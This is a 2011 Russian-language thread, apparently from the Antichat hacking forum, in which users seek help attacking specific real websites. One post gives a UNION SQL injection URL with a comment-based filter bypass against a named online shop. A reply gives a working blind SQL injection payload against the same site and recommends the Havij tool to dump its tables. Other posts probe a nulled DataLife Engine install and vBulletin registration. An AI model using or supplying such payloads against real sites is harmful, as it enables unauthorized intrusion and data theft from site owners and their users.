14.08.2011, 19:48
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
Сообщение от Konqi
Покажи мне запросы по которым ты определил что там скуля
через BENCHMARK определил,но уже пишет форбиденн
|
|
|
14.08.2011, 19:54
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Konqi
Покажи мне запросы по которым ты определил что там скуля
int или intval в скрипте убери, тогда увидешь
|
|
|
|
14.08.2011, 20:22
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
Сообщение от попугай
int или intval в скрипте убери, тогда увидешь
в каком скрипте?
|
|
|
|
14.08.2011, 20:34
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Faaax
в каком скрипте?
В этом параметре нету уязвимости. =\
|
|
|
|
15.08.2011, 11:45
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
ошибка на гл странице dle сайт
Код:
Deprecated: Function ereg() is deprecated in [PATH]/engine/modules/register.php on line 41
можно ли что то извлеч? или узнать версию?
стоит нулл
Сообщение от None
DataLife Engine Nulled by M.I.D-Team (http://www.mid-team.ws)
примерно версии середины лета 2009 года (точно хз не работал с dle) |
|
|
|
15.08.2011, 11:49
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Нет.
|
|
|
|
15.08.2011, 12:23
|
|
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами:
7864886
Репутация:
0
|
|
WAF help please
http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
|
|
|
|
15.08.2011, 12:55
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
есть форум на vbulletin. На почту не приходит уведомление для реги,тобишь группы нереал посмотреть. Есть ли альтернативный способ, допустим узнать имя любой группы, либо создать её?
|
|
|
|
15.08.2011, 12:58
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от oODungVTOo
WAF help please
http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
blind sql inj. Фильтруется union. Версия 4-я. Так что тут особо ловить нечего. Юзай проги типа хавиджа, они те и раскрутят скулю и попробуют подобрать по словарю имён таблиц и колонок.
пример скули:
Код:
http://www.pampling.com/ficha_producto.php?id_producto=26+and+1=(select+if(ascii(substr(version(),1))=52,1,0))--+
|
|
|
|
15.08.2011, 14:09
|
|
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами:
7864886
Репутация:
0
|
|
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4
I don't see difference at this page........can u help me?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
